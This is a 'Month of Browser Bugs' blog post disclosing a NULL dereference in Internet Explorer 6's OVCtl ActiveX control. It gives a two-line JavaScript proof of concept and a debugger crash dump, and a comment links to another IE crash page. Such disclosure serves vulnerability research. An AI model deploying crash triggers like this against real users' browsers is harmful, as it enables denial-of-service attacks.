MoBB #20: OVCtl NewDefaultItem
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.
var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();
Demonstration
eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference
posted by hdm @ 10:22 PM
1 comments
links to this post
1 Comments:
Several Month after reporting this bug MS gave no reaction here's a bug which I found as I tried something with IE and :hover
I am no security expert, so I don't know what to do with this, if it is possible to use it for more then just crashing the IE, ... perhaps you loke to find out:
http://www.ernestoruge.de/misc/websites/iecrash/
Have fun!
Infinity - mail@ernestoruge.de
Post a Comment
Links to this post:
Create a Link
<< Home